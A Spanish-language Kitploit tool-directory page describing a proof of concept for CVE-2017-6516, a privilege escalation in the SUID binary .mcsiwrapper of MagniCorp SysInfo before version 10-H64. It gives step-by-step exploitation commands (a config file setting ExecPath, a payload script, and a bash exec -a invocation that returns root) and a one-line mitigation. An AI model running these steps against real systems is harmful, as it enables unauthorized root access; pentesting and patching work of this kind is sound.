Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-6516-mcsiwrapper- — Un PoC / metodología para explotar CVE-2017-6516 | Kitploit
Herramientas/GitHubGitHub/rubytox/cve-2017-6516-mcsiwrapper-
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónExplotación de Binarios
GitHubrubytox/cve-2017-6516-mcsiwrapper-

CVE-2017-6516-mcsiwrapper-

Un PoC / metodología para explotar CVE-2017-6516

Ver Repositorio
hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2017-6516

CVE-2017-6516 es una vulnerabilidad de escalada de privilegios que apunta al binario .mcsiwrapper de MagniCorp SysInfo en versiones anteriores a la 10-H64. Cuando este binario tiene el bit SUID activado y está desactualizado, un usuario puede ejecutar código arbitrario como el propietario del binario, que suele ser root.

Requisitos

  • El binario .mcsiwrapper debe tener setuid:
root@kitploit:~
$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
  • El binario .mcsiwrapper debe estar por debajo de la versión 10-H64:
root@kitploit:~
$ .mcsiwrapper --version
<Version under 10-H64>

Explotación

Crea un archivo config con el siguiente contenido:

root@kitploit:~
ExecPath=<Path to a writeable directory>

Crea un archivo ejecutable de payload en el directorio ExecPath, por ejemplo:

root@kitploit:~
#!/bin/sh
whoami

Y hazlo ejecutable:

root@kitploit:~
$ chmod +x payload

Ejecuta el comando:

root@kitploit:~
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root

Mitigaciones

Actualiza .mcsiwrapper al menos a la versión 10-H64.

Descargar herramienta